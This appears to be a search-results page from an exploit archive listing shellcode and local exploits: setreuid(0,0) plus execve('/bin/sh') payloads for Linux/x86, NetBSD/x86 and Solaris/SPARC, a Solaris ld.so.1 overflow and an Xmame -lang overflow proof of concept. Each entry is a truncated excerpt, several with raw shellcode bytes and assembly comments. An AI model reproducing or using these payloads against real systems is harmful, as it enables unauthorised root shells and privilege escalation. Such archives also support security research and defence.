119 matches found
Solaris Runtime Linker (ld.so.1) Buffer Overflow Exploit (SPARC version
No description provided by source. / ld.so.1 exploit SPARC coded by: osker178 bjr213 psu.edu Alright, so this exploits a fairly standard buffer overflow in the default Solaris runtime linker ld.so.1 discovery by Jouko Pynnonen Only real deviation here from the standard overflow and return into li...
linux/x86 executes command after setreuid (9 + 40 bytes + cmd)
No description provided by source. / bunkerexec.c V1.3 - Tue Mar 21 22:50:18 CET 2006 Linux/x86 bytecode that executes command after setreuid 9 + 40 bytes + cmd setreuid0, 0 + execve"/bin//sh", "/bin//sh","-c","cmd", NULL; "cmd" MUST be terminated with ";" better with ";exit;" :-D bunker -...
solaris/sparc executes command after setreuid (92 bytes + cmd)
Exploit for solaris/sparc platform in category shellcode ============================================================== solaris/sparc executes command after setreuid 92 bytes + cmd ============================================================== / bunkersparcexec.c V1.0 - Sat Oct 21 17:45:27 CEST...
solaris/sparc executes command after setreuid 92 bytes + cmd
solaris/sparc executes command after setreuid 92 bytes + cmd. Shellcode exploit for solarissparc platform / bunkersparcexec.c V1.0 - Sat Oct 21 17:45:27 CEST 2006 Solaris/sparc bytecode that executes command after setreuid 92 bytes + cmd setreuid0, 0 + execve"/bin/sh", "/bin/sh","-c","cmd", NULL;...
linux/x86 executes command after setreuid (9 + 40 bytes + cmd)
Exploit for linux/x86 platform in category shellcode ============================================================== linux/x86 executes command after setreuid 9 + 40 bytes + cmd ============================================================== / bunkerexec.c V1.3 - Tue Mar 21 22:50:18 CET 2006...
linux/x86 executes command after setreuid 9 + 40 bytes + cmd
linux/x86 executes command after setreuid 9 + 40 bytes + cmd. Shellcode exploit for linx86 platform / bunkerexec.c V1.3 - Tue Mar 21 22:50:18 CET 2006 Linux/x86 bytecode that executes command after setreuid 9 + 40 bytes + cmd setreuid0, 0 + execve"/bin//sh", "/bin//sh","-c","cmd", NULL; "cmd" MUS...
linux/x86 setreuid(0,0) execve("/bin/sh", ["/bin/sh", NULL]) 33 bytes
Exploit for linux/x86 platform in category shellcode ===================================================================== linux/x86 setreuid0,0 execve"/bin/sh", "/bin/sh", NULL 33 bytes ===================================================================== / Linux/x86 setreuid0,0 + execve"/bin/sh...
linux/x86 - setreuid0,0 execve"/bin/sh", "/bin/sh", NULL 33 bytes
linux/x86 setreuid0,0 execve"/bin/sh", "/bin/sh", NULL 33 bytes. Shellcode exploit for linx86 platform / Linux/x86 setreuid0,0 + execve"/bin/sh", "/bin/sh", NULL - 33 bytes - [email protected] / char shellcode = "\x6a\x46" // push $0x46 "\x58" // pop %eax "\x31\xdb" // xor %ebx, %ebx "\x31\xc9" //...
linux/x86 setreuid(0 0) execve(""/bin/sh"" [""/bin/sh"" NULL]) 33 bytes
No description provided by source. / Linux/x86 setreuid0,0 + execve"/bin/sh", "/bin/sh", NULL - 33 bytes - [email protected] / char shellcode = "\x6a\x46" // push $0x46 "\x58" // pop %eax "\x31\xdb" // xor %ebx, %ebx "\x31\xc9" // xor %ecx, %ecx "\xcd\x80" // int $0x80 "\x31\xd2" // xor %edx, %edx...
linux/x86 setreuid(0, 0) + execve(/bin/sh) 31 bytes
Exploit for linux/x86 platform in category shellcode =================================================== linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes =================================================== / linux/x86 setreuid0, 0 + execve"/bin/sh", "/bin/sh", NULL, NULL - 31 bytes - izik / char...
Xmame 0.102 (-lang) Local Buffer Overflow Exploit
No description provided by source. !/usr/bin/ruby One of the PoC code for xmame "-lang" options. Advisory is base on : http://kerneltrap.org/node/6055 by xwings at mysec dot org url : http://www.mysec.org , new website Tested on : Linux debian24 2.4.27-2-386 1 Mon May 16 16:47:51 JST 2005 i686...
netbsd/x86 setreuid0, 0; execve"/bin//sh", ..., NULL; 30 bytes
netbsd/x86 setreuid0, 0; execve"/bin//sh", ..., NULL; 30 bytes. Shellcode exploit for netbsdx86 platform / minervini at neuralnoise dot com c 2005 NetBSD/i386 2.0, setreuid0, 0; execve"/bin//sh", ..., NULL; / include include include char scode = "\x31\xc0" // xor %eax,%eax "\x50" // push %eax...
netbsd/x86 setreuid0, 0; execve"/bin//sh", ..., NULL; 29 bytes
netbsd/x86 setreuid0, 0; execve"/bin//sh", ..., NULL; 29 bytes. Shellcode exploit for netbsdx86 platform / minervini at neuralnoise dot com c 2005 NetBSD/i386 2.0, setreuid0, 0; execve"/bin//sh", ..., NULL; note: unsafe shellcode, but 29 bytes long; doesn't work if eax & 0x40000000 != 0; / includ...
solaris/sparc setreuid/execve 56 bytes
No description provided by source. / [email protected] setreuid shellcode full description of how it was done and defines at http://www.telegenetic.net/sparc-shellcode.htm / char shellcode = "\x90\x1A\x40\x09" / xor %o1, %o1, %o0 / "\x92\x1A\x40\x09" / xor %o1, %o1, %o1 / "\x82\x10\x20\xCA" /...
solaris/sparc setreuid/execve 56 bytes
solaris/sparc setreuid/execve 56 bytes. Shellcode exploit for solarissparc platform / [email protected] setreuid shellcode full description of how it was done and defines at http://www.telegenetic.net/sparc-shellcode.htm / char shellcode = "\x90\x1A\x40\x09" / xor %o1, %o1, %o0 /...
solaris/sparc setreuid/execve 56 bytes
Exploit for solaris/sparc platform in category shellcode ====================================== solaris/sparc setreuid/execve 56 bytes ====================================== / email protected setreuid shellcode full description of how it was done and defines at...
linux/x86 setreuid/execve 31 bytes
Exploit for linux/x86 platform in category shellcode ================================== linux/x86 setreuid/execve 31 bytes ================================== / 31 byte setreuid shellcode - man shadow os: Slackware 9.1, Phlak 2.4, Knoppix 0.1 www.manshadow.org email protected irc.efnet.net manshad...
linux/x86 setreuid/execve 31 bytes
No description provided by source. / 31 byte setreuid shellcode - man shadow os: Slackware 9.1, Phlak 2.4, Knoppix 0.1 www.manshadow.org [email protected] irc.efnet.net manshadow / char shellcode = "\x31\xC9" / xor ecx,ecx / "\x31\xDB" / xor ebx,ebx / "\x6A\x46" / push byte 70 / "\x58" / pop eax...
Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0,0) + execve() Shellcode (566 bytes)
Linux/x86 - Audio knock knock knock via /dev/dsp + setreuid0,0 + execve Shellcode 566 bytes. Shellcode exploit for Linuxx86 platform / Audio knock knock knock via /dev/dsp + setreuid0,0 + execve shellcode. Linux x86 Author: Cody Tubbs loophole of hhp. www.hhp-programming.net / [email protected]...